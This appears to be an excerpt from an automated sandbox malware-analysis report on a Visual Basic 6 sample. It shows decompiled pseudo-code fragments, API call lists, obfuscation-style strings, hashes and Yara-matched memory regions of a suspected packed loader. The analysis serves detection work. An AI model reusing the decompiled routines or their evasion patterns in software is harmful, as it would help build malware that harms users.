				L0040178E();
				_v148 = _t61;
				if(_v148 >= 0) {
					_v180 = _v180 & 0x00000000;
				} else {
					_push(_v148);
					L00401788();
					_v180 = _t61;
				}
				_v128 = 0x68fb6f;
				_v136 = 0x8003;
				_push( &_v88);
				_t63 =  &_v136;
				_push(_t63);
				L00401794();
				_v152 = _t63;
				_push( &_v88);
				_push( &_v72);
				_push(2);
				L004018F6();
				_t66 = _v152;
				if(_t66 != 0) {
					_v8 = 3;
					_t101 =  *0x40146c;
					L00401776();
					_push(_t76);
					_push(_t76);
					_v80 = _t101;
					L0040177C();
					_push(_t76);
					_push(_t76);
					_v88 = _t101;
					L00401782();
					L0040192C();
					_v8 = 4;
					_push(0xffffffff);
					L004017FA();
					_v8 = 5;
					_push(L"ferskvandsfiskenes"); // executed
					L004017AC(); // executed
					_v48 = _t66;
					_v8 = 6;
					_push(0xe4);
					_push(L"MIDLERTIDIGE");
					L00401800();
					L0040192C();
					_v80 = 0xa0;
					_v88 = 2;
					_v176 = _v56;
					_v56 = _v56 & 0x00000000;
					_v64 = _v176;
					_v72 = 8;
					_push( &_v88);
					_push(0x61);
					_push( &_v72);
					_push( &_v104);
					L00401896();
					_push( &_v104);
					L00401908();
					L0040192C();
					L004018E4();
					_push( &_v104);
					_push( &_v88);
					_t66 =  &_v72;
					_push(_t66);
					_push(3);
					L004018F6();
				}
				_v8 = 8;
				L004018DE();
				asm("wait");
				_push(0x4229a6);
				L004018E4();
				L004018E4();
				return _t66;
			}

0x00422770
0x00422773
0x00422776
0x00422781
0x00422782
0x0042278e
0x00422796
0x00422799
0x004227a0
0x004227a7
0x004227ae
0x004227b8
0x004227bb
0x004227c2
0x004227c8
0x004227c9
0x004227ca
0x004227cd
0x004227d2
0x004227de
0x004227e1
0x004227eb
0x004227ec
0x004227ef
0x004227f0
0x004227f5
0x00422802
0x00422817
0x00422804
0x00422804
0x0042280a
0x0042280f
0x0042280f
0x0042281e
0x00422825
0x00422832
0x00422833
0x00422839
0x0042283a
0x0042283f
0x00422849
0x0042284d
0x0042284e
0x00422850
0x00422858
0x00422861
0x00422867
0x0042286e
0x00422874
0x00422879
0x0042287a
0x0042287b
0x0042287e
0x00422883
0x00422884
0x00422885
0x00422888
0x00422892
0x00422897
0x0042289e
0x004228a0
0x004228a5
0x004228ac
0x004228b1
0x004228b6
0x004228b9
0x004228c0
0x004228c5
0x004228ca
0x004228d4
0x004228d9
0x004228e0
0x004228ea
0x004228f0
0x004228fa
0x004228fd
0x00422907
0x00422908
0x0042290d
0x00422911
0x00422912
0x0042291a
0x0042291b
0x00422925
0x0042292d
0x00422935
0x00422939
0x0042293a
0x0042293d
0x0042293e
0x00422940
0x00422945
0x00422948
0x00422957
0x0042295c
0x0042295d
0x00422998
0x004229a0
0x004229a5

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042278E
#586.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 004227CD
#564.MSVBVM60(00000005,?), ref: 004227F0
__vbaHresultCheck.MSVBVM60(00000000), ref: 0042280A
__vbaVarTstGe.MSVBVM60(00008003,?), ref: 0042283A
__vbaFreeVarList.MSVBVM60(00000002,00000005,?,00008003,?), ref: 00422850
__vbaFPInt.MSVBVM60(?,?,004015F6), ref: 00422874
#587.MSVBVM60(?,?,?,?,004015F6), ref: 0042287E
__vbaStrR8.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00422888
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00422892
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,004015F6), ref: 004228A0
#578.MSVBVM60(ferskvandsfiskenes,000000FF,?,?,?,?,?,?,004015F6), ref: 004228B1
#512.MSVBVM60(MIDLERTIDIGE,000000E4,ferskvandsfiskenes,000000FF,?,?,?,?,?,?,004015F6), ref: 004228CA
__vbaStrMove.MSVBVM60(MIDLERTIDIGE,000000E4,ferskvandsfiskenes,000000FF,?,?,?,?,?,?,004015F6), ref: 004228D4
#629.MSVBVM60(?,00000008,00000061,00000002), ref: 00422912
__vbaStrVarMove.MSVBVM60(?,?,00000008,00000061,00000002), ref: 0042291B
__vbaStrMove.MSVBVM60(?,?,00000008,00000061,00000002), ref: 00422925
__vbaFreeStr.MSVBVM60(?,?,00000008,00000061,00000002), ref: 0042292D
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,?,?,00000008,00000061,00000002), ref: 00422940
__vbaStrCopy.MSVBVM60(?,?,004015F6), ref: 00422957
__vbaFreeStr.MSVBVM60(004229A6,?,?,004015F6), ref: 00422998
__vbaFreeStr.MSVBVM60(004229A6,?,?,004015F6), ref: 004229A0

Strings

Follower, xrefs: 0042294F
MIDLERTIDIGE, xrefs: 004228C5
ferskvandsfiskenes, xrefs: 004228AC

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$Move$List$#512#564#578#586#587#629CheckChkstkCopyErrorHresult
String ID: Follower$MIDLERTIDIGE$ferskvandsfiskenes
API String ID: 3788620440-2851547927
Opcode ID: a934bec1d579792bae664870f6865b4c3ab27f63342cd3596001b7907960a1ee
Instruction ID: 52b3b142c2b8f54aa45094b7284ac5d5b955da3389c8af1bb92a6dd064daef62
Opcode Fuzzy Hash: a934bec1d579792bae664870f6865b4c3ab27f63342cd3596001b7907960a1ee
Instruction Fuzzy Hash: FB510CB1D00218AADB10EFE1C946BEEB7B8BF04708F50816AE145B71E1DB785B48CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA04, Relevance: 4.5, APIs: 3, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E0041FA04(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				signed int _v44;
				signed int _v56;
				signed int _t35;
				void* _t40;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				 *[fs:0x0] = _t43;
				L004015F0();
				_v16 = _t43;
				_v12 = E00401250;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x20,  *[fs:0x0], 0x4015f6, _t40);
				_t35 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v40);
				_v44 = _t35;
				if(_v44 >= 0) {
					_v56 = _v56 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40364c);
					_push(_a4);
					_push(_v44);
					L0040193E();
					_v56 = _t35;
				}
				L00401938();
				_v8 = 0;
				_push(0x41faa8);
				return _t35;
			}

0x0041fa07
0x0041fa16
0x0041fa20
0x0041fa28
0x0041fa2b
0x0041fa38
0x0041fa41
0x0041fa4c
0x0041fa5b
0x0041fa61
0x0041fa68
0x0041fa84
0x0041fa6a
0x0041fa6a
0x0041fa6f
0x0041fa74
0x0041fa77
0x0041fa7a
0x0041fa7f
0x0041fa7f
0x0041fa8b
0x0041fa90
0x0041fa97
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0041FA20
__vbaHresultCheckObj.MSVBVM60(00000000,00401250,0040364C,000006F8), ref: 0041FA7A
__vbaFreeVar.MSVBVM60(00000000,00401250,0040364C,000006F8), ref: 0041FA8B

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$CheckChkstkFreeHresult
String ID:
API String ID: 2492882051-0
Opcode ID: d17a9e46d55623236fe0e87a1cb822847c658e6fa62edbc06acc3592f0fbf72b
Instruction ID: 015e241de5490ac704b9d4acba770fee5fca708564ebbe23596acf096d368634
Opcode Fuzzy Hash: d17a9e46d55623236fe0e87a1cb822847c658e6fa62edbc06acc3592f0fbf72b
Instruction Fuzzy Hash: 63111871940208FFCB00DF98C945BCD7FB4EF08794F20806AF409AB2A1C7799A85DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040195C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401961

Strings

VB5!6&*, xrefs: 0040195C

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 09c2f517ef9ddf11d583556045e94d488c3982481399cfdd421ea7289bcf7bc8
Instruction ID: 251dc9ecb88731482c2517662a7a546dc4a81049017ee1211d2b3fec239490de
Opcode Fuzzy Hash: 09c2f517ef9ddf11d583556045e94d488c3982481399cfdd421ea7289bcf7bc8
Instruction Fuzzy Hash: 8C51217214E3C28FC3038B748C2A1A5BF71AE1721571A85DBC8D2CF0F3D669580ACB66

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04D16005, Relevance: 5.7, Strings: 4, Instructions: 653COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: 384c52ca37468e76e473627f42abe6d13b187b60891ee432f1edd4b188269057
Instruction ID: f98f7b7c384e14e834c033fabbed2d9454a8caa4eff9807287843a0a18a5ec4c
Opcode Fuzzy Hash: 384c52ca37468e76e473627f42abe6d13b187b60891ee432f1edd4b188269057
Instruction Fuzzy Hash: 5C520FB2604349EFDB748F68DD557EA77B2FF95340F45812AEC899B220D334AA81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04D1632E, Relevance: 5.6, Strings: 4, Instructions: 647COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: 30e3eac439b27ef828dd5d57895a041067a26426c831d552027f24b05829ad80
Instruction ID: 78a6e301a2d0d6b847c59e8513b1bc6bafe1af478ec511626f64c2d09107e7ef
Opcode Fuzzy Hash: 30e3eac439b27ef828dd5d57895a041067a26426c831d552027f24b05829ad80
Instruction Fuzzy Hash: DB4233B1604348AFDB748F28DD557EA7BB2FF59310F14812DEC899B264D334AA81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04D160F6, Relevance: 5.6, Strings: 4, Instructions: 640COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: 40c442583ad521202dcd162e79d889cf47c5e5f62e8742d17adeeae9a3cee228
Instruction ID: c959ef724b41b8314c366bf3705ed2cd6198ef42200a2f2f2e73f7a85706015c
Opcode Fuzzy Hash: 40c442583ad521202dcd162e79d889cf47c5e5f62e8742d17adeeae9a3cee228
Instruction Fuzzy Hash: 10520EB2604389EFDB748F68DD547DA7BB2FF55340F15812AEC899B260D334AA81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04D160CA, Relevance: 5.6, Strings: 4, Instructions: 629COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: 1fa9b257a31bcdbc62cd2b7917089c3a65d8c7a33130ad257d32de8d193e4c92
Instruction ID: cbbeff18bb37eff4486d06463a26a1f648d85b475c79bb6385ef7d29a1af200c
Opcode Fuzzy Hash: 1fa9b257a31bcdbc62cd2b7917089c3a65d8c7a33130ad257d32de8d193e4c92
Instruction Fuzzy Hash: BD4200B2604349EFDB748F68DD547EA7BB2FF95340F558219EC899B220D334AA81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04D16214, Relevance: 5.6, Strings: 4, Instructions: 597COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: b1e7758905225fe667e06d0b42986eea6b48aa904daa3e474c966d10b1576811
Instruction ID: c260a4b81f3002221de986384250c9afbb6a90a2f8809cd0a5aadcbbb6caf1da
Opcode Fuzzy Hash: b1e7758905225fe667e06d0b42986eea6b48aa904daa3e474c966d10b1576811
Instruction Fuzzy Hash: 1D4210B2604348EFDB748F68DD557EA77B2FF95310F158129EC899B220D334AA81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 04D163ED, Relevance: 5.5, Strings: 4, Instructions: 511COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: caab0ad4d96b9158e74026111d186e8e149a209451ea38f3c7cb4360530210d4
Instruction ID: f44277986426a33abe9d25a27db733fc3b4266fac893d5ed91fcbe0f8e1623af
Opcode Fuzzy Hash: caab0ad4d96b9158e74026111d186e8e149a209451ea38f3c7cb4360530210d4
Instruction Fuzzy Hash: 3022FFB1604349EFDB648F64DD917EAB7B2FF55340F15822DEC899B220D334AA81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D16589, Relevance: 5.4, Strings: 4, Instructions: 448COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: 7bf79f8d5330c5c51718f9b67a602897002da63c873a2fb56520f835caab291a
Instruction ID: bf5dc729fa4190d303924483b888728704f597fcd5aefe4080139c87ef464212
Opcode Fuzzy Hash: 7bf79f8d5330c5c51718f9b67a602897002da63c873a2fb56520f835caab291a
Instruction Fuzzy Hash: 7E12FEB2604349EFDB648F64DD417EA77B2FF55340F15822EED899B220D334AA81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04D165C9, Relevance: 5.4, Strings: 4, Instructions: 439COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: 72f18a40efe3cd9c709ee8bebb4ed253aac5312964483dd02b282de011ed8057
Instruction ID: 5112dadcc1475c84f00ca4e7c4e8d15201134ffbe7445cb11a77bc190a761a3f
Opcode Fuzzy Hash: 72f18a40efe3cd9c709ee8bebb4ed253aac5312964483dd02b282de011ed8057
Instruction Fuzzy Hash: 7712EDB1604388EFDB688F64DD517EA77B2FF55340F05812AED899B220D374AA81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D1663D, Relevance: 5.4, Strings: 4, Instructions: 422COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: 135db85ffe10404a213fe454ff31d042639c6a81f580cd9e54417c49a798f9df
Instruction ID: 018af33829815788e64df2c7ae444b77b2a6a4c715db2195bd346a80def49705
Opcode Fuzzy Hash: 135db85ffe10404a213fe454ff31d042639c6a81f580cd9e54417c49a798f9df
Instruction Fuzzy Hash: 6602FEB1604388AFDB789F68DD517EA77B2FF55340F05412EED899B220D374AA81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04D16759, Relevance: 5.4, Strings: 4, Instructions: 387COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Ak, xrefs: 04D16844
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Ak$Sb$B
API String ID: 0-1358274953
Opcode ID: 9389ee15c78152639526f5fc0ceb1196472e898e3dc7c6b96c697f7dfd0a5bdc
Instruction ID: 488dad5a538bb023314562b04b3e6a49c25e6cb81711ebfa0222a94d3a992180
Opcode Fuzzy Hash: 9389ee15c78152639526f5fc0ceb1196472e898e3dc7c6b96c697f7dfd0a5bdc
Instruction Fuzzy Hash: ECF1EDB1604388EFDB749F68DD417EA77B2FF55340F15412AED899B220D370AA81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D1706B, Relevance: 5.1, Strings: 4, Instructions: 148COMMON

Download Yara Rule

Strings

;a, xrefs: 04D1724A
`, xrefs: 04D172A4
Sb, xrefs: 04D17132
s`, xrefs: 04D17312

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: ;a$Sb$s`$`
API String ID: 0-1108568514
Opcode ID: ddf9dfc3eb5a74cbbc721e0f1391e6c386d3f4bb7095d558346c5d32462a099f
Instruction ID: 7c4bd1479d81c3cca9ce42c6622254a643fff21250503a695ddaffa413d59d61
Opcode Fuzzy Hash: ddf9dfc3eb5a74cbbc721e0f1391e6c386d3f4bb7095d558346c5d32462a099f
Instruction Fuzzy Hash: 5A51EFB1600389AFCF719E38DD547DA3BE2BF68320F248115ED499B224D335AA52CB10

Uniqueness

Uniqueness Score: -1.00%

Function 04D168D1, Relevance: 4.1, Strings: 3, Instructions: 335COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Sb$B
API String ID: 0-4191558054
Opcode ID: 9c69802454dcf757528867c81d9560b9c823042d4f3866e0239a083a45823cbb
Instruction ID: 1dacd136b94a8584882da7f3db1b932f07f3a464ef28507bb1aa6a7619fea392
Opcode Fuzzy Hash: 9c69802454dcf757528867c81d9560b9c823042d4f3866e0239a083a45823cbb
Instruction Fuzzy Hash: BCE1FFB1604348EFDF759E68DD817EA77B2FF59300F15412AED899B220D330AA81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D16951, Relevance: 4.1, Strings: 3, Instructions: 320COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Sb$B
API String ID: 0-4191558054
Opcode ID: 7d6eb83a884deea90f85e6fa96203fc7d55effd019622c7a81b8f8a42d782a4e
Instruction ID: a95f534acd0236513d798d738e57a1c57e5c353f4b978d6769f077401811e408
Opcode Fuzzy Hash: 7d6eb83a884deea90f85e6fa96203fc7d55effd019622c7a81b8f8a42d782a4e
Instruction Fuzzy Hash: 2BD1EDB1604348EFDF758E68DD417EA77B2FF59300F15412AED899B220D374AA81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D169B1, Relevance: 4.1, Strings: 3, Instructions: 311COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Sb$B
API String ID: 0-4191558054
Opcode ID: 91a6fe67bb740adaf2624fd960ecec8e307b99e6658c35187579a2d37005a475
Instruction ID: 05b755013ac2c2feb96653841cc160d033fd428b564e9b90b79d2b7564bade8f
Opcode Fuzzy Hash: 91a6fe67bb740adaf2624fd960ecec8e307b99e6658c35187579a2d37005a475
Instruction Fuzzy Hash: E1D10EB1604348EFDF758E68DD817EA77B2FF59300F15412AED899B220D370AA81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04D16A75, Relevance: 4.0, Strings: 3, Instructions: 275COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Sb$B
API String ID: 0-4191558054
Opcode ID: 9fe6f2ced1d196c9aa1e6a4112f66d36b2d0699c5399577d428615968d2ed947
Instruction ID: 405bd000bf081aea976f8554456d5ea7e7166c3772b6efd8a71e7c394a28903c
Opcode Fuzzy Hash: 9fe6f2ced1d196c9aa1e6a4112f66d36b2d0699c5399577d428615968d2ed947
Instruction Fuzzy Hash: 6CC1EEB1604388AFDF758F68DD807DA77A2FF59300F15812AED898B224D374AA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04D16B4E, Relevance: 4.0, Strings: 3, Instructions: 269COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Sb$B
API String ID: 0-4191558054
Opcode ID: b025244dcbab7ceb85f0d068a100721723a4396168a9f4d60db0dc05b1ea95a1
Instruction ID: f9682b43731e61f97395f0d063d807b9ddec261401356fb424c143bc7ba1244f
Opcode Fuzzy Hash: b025244dcbab7ceb85f0d068a100721723a4396168a9f4d60db0dc05b1ea95a1
Instruction Fuzzy Hash: B4B11EB1600288AFDF75CF68DD847DA7BA2FF58310F15812AED49DB224D374AA81CB00

Uniqueness

Uniqueness Score: -1.00%

Function 04D16C93, Relevance: 4.0, Strings: 3, Instructions: 206COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Sb$B
API String ID: 0-4191558054
Opcode ID: 22e2a125a2378990305d7453beb107e225866e6d8ddcea14f1521be9a60a06ca
Instruction ID: 511bbe66787a1c6a7db08ceadb03b41a0e5b7872df8dab85093a23f5463a3999
Opcode Fuzzy Hash: 22e2a125a2378990305d7453beb107e225866e6d8ddcea14f1521be9a60a06ca
Instruction Fuzzy Hash: FB91F1B1604388AFDF759F68CD847DA77A2FF59300F19812AED4D9B220D374AA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04D16DC9, Relevance: 3.9, Strings: 3, Instructions: 161COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
w}v, xrefs: 04D16DED
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: w}v$Sb$B
API String ID: 0-4191558054
Opcode ID: f24ad92d29f3a6a31b6473bb655ca808e67b90f60358fd67f2cd3ce8512a29e8
Instruction ID: 6ce07ca3844242bceb71bac037ff0ad39e0abf3cbd3349cee95493c0aea4a416
Opcode Fuzzy Hash: f24ad92d29f3a6a31b6473bb655ca808e67b90f60358fd67f2cd3ce8512a29e8
Instruction Fuzzy Hash: FC61BEB1600288AFDF749E64CD847DA77B6FF98300F15822AED499B224C374AA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04D16EE9, Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

B, xrefs: 04D16EF9
Sb, xrefs: 04D17132

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: Sb$B
API String ID: 0-922141403
Opcode ID: 8d7802e590f366125688531198d2a1f101caded292f971fd9c9f5f7d717e4939
Instruction ID: 44f68156a99ccff30d80b60d77105db6ef3d76dd4397172f5263ed6361b22549
Opcode Fuzzy Hash: 8d7802e590f366125688531198d2a1f101caded292f971fd9c9f5f7d717e4939
Instruction Fuzzy Hash: 3D51E2B1600249EFDFB49F68CD847CA77A6FF58304F15422AEE0C8B224C734AA42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04D17C39, Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

`, xrefs: 04D17E5C
00$&, xrefs: 04D17EA4

Memory Dump Source

Source File: 00000000.00000002.1190265703.0000000004D10000.00000040.00000001.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_G47wmLn8uy.jbxd

Yara matches

Similarity

API ID:
String ID: 00$&$`
